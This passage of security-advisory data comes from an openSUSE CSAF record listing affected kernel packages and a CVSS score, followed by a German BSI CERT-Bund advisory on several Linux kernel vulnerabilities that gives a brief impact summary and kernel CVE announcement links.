"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2026-23011"
}
]
}
WID-SEC-W-2026-0215
Vulnerability from csaf_certbund - Published: 2026-01-25 23:00 - Updated: 2026-03-26 23:00Summary
Linux Kernel: Mehrere Schwachstellen
Severity
Hoch
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung: Der Kernel stellt den Kern des Linux Betriebssystems dar.
Angriff: Ein Angreifer kann mehrere Schwachstellen im Linux Kernel ausnutzen, um nicht näher spezifizierte Angriffe durchzuführen, die möglicherweise zu einer Denial-of-Service- Bedingung führen oder eine Speicherbeschädigung verursachen können.
Betroffene Betriebssysteme: - Linux
References
| URL | Category | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Der Kernel stellt den Kern des Linux Betriebssystems dar.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein Angreifer kann mehrere Schwachstellen im Linux Kernel ausnutzen, um nicht n\u00e4her spezifizierte Angriffe durchzuf\u00fchren, die m\u00f6glicherweise zu einer Denial-of-Service- Bedingung f\u00fchren oder eine Speicherbesch\u00e4digung verursachen k\u00f6nnen.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2026-0215 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0215.json"
},
{
"category": "self",
"summary": "WID-SEC-2026-0215 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0215"
},
{
"category": "external",
"summary": "Kernel CVE Announce Mailingliste",
"url": "https://lore.kernel.org/linux-cve-announce/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71145",
"url": "https://lore.kernel.org/linux-cve-announce/2026012321-CVE-2025-71145-4c0a@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71146",
"url": "https://lore.kernel.org/linux-cve-announce/2026012325-CVE-2025-71146-96cf@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71147",
"url": "https://lore.kernel.org/linux-cve-announce/2026012327-CVE-2025-71147-a296@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71148",
"url": "https://lore.kernel.org/linux-cve-announce/2026012327-CVE-2025-71148-78e6@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71149",
"url": "https://lore.kernel.org/linux-cve-announce/2026012328-CVE-2025-71149-c9ee@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71150",
"url": "https://lore.kernel.org/linux-cve-announce/2026012328-CVE-2025-71150-1b7c@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71151",
"url": "https://lore.kernel.org/linux-cve-announce/2026012328-CVE-2025-71151-1a45@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71152",
"url": "https://lore.kernel.org/linux-cve-announce/2026012302-CVE-2025-71152-055a@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71153",
"url": "https://lore.kernel.org/linux-cve-announce/2026012305-CVE-2025-71153-246e@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71154",
"url": "https://lore.kernel.org/linux-cve-announce/2026012305-CVE-2025-71154-bc99@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71155",
"url": "https://lore.kernel.org/linux-cve-announce/2026012306-CVE-2025-71155-7691@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71156",
"url": "https://lore.kernel.org/linux-cve-announce/2026012306-CVE-2025-71156-f8f2@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71157",
"url": "https://lore.kernel.org/linux-cve-announce/2026012306-CVE-2025-71157-3a03@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71158",
"url": "https://lore.kernel.org/linux-cve-announce/2026012344-CVE-2025-71158-1cfa@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71159",
"url": "https://lore.kernel.org/linux-cve-announce/2026012346-CVE-2025-71159-417a@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71160",
"url": "https://lore.kernel.org/linux-cve-announce/2026012346-CVE-2025-71160-8c5d@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71161",
"url": "https://lore.kernel.org/linux-cve-announce/2026012346-CVE-2025-71161-4b58@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71162",
"url": "https://lore.kernel.org/linux-cve-announce/2026012530-CVE-2025-71162-c0b7@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71163",
"url": "https://lore.kernel.org/linux-cve-announce/2026012532-CVE-2025-71163-03ce@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-22978",
"url": "https://lore.kernel.org/linux-cve-announce/2026012347-CVE-2026-22978-4e34@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-22979",
"url": "https://lore.kernel.org/linux-cve-announce/2026012347-CVE-2026-22979-b883@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-22980",
"url": "https://lore.kernel.org/linux-cve-announce/2026012347-CVE-2026-22980-6031@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-22981",
"url": "https://lore.kernel.org/linux-cve-announce/2026012348-CVE-2026-22981-94c5@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-22982",
"url": "https://lore.kernel.org/linux-cve-announce/2026012348-CVE-2026-22982-b250@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-22983",
"url": "https://lore.kernel.org/linux-cve-announce/2026012348-CVE-2026-22983-db37@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-22984",
"url": "https://lore.kernel.org/linux-cve-announce/2026012349-CVE-2026-22984-001c@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-22985",
"url": "https://lore.kernel.org/linux-cve-announce/2026012349-CVE-2026-22985-9a80@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-22986",
"url": "https://lore.kernel.org/linux-cve-announce/2026012349-CVE-2026-22986-5992@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-22987",
"url": "https://lore.kernel.org/linux-cve-announce/2026012350-CVE-2026-22987-8984@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-22988",
"url": "https://lore.kernel.org/linux-cve-announce/2026012350-CVE-2026-22988-1ee5@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-22989",
"url": "https://lore.kernel.org/linux-cve-announce/2026012350-CVE-2026-22989-06be@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-22990",
"url": "https://lore.kernel.org/linux-cve-announce/2026012351-CVE-2026-22990-a62e@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-22991",
"url": "https://lore.kernel.org/linux-cve-announce/2026012351-CVE-2026-22991-e4a2@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-22992",
"url": "https://lore.kernel.org/linux-cve-announce/2026012351-CVE-2026-22992-0607@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-22993",
"url": "https://lore.kernel.org/linux-cve-announce/2026012352-CVE-2026-22993-2e35@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-22994",
"url": "https://lore.kernel.org/linux-cve-announce/2026012352-CVE-2026-22994-ab5f@gregkh/"
},
{
"category": "external",
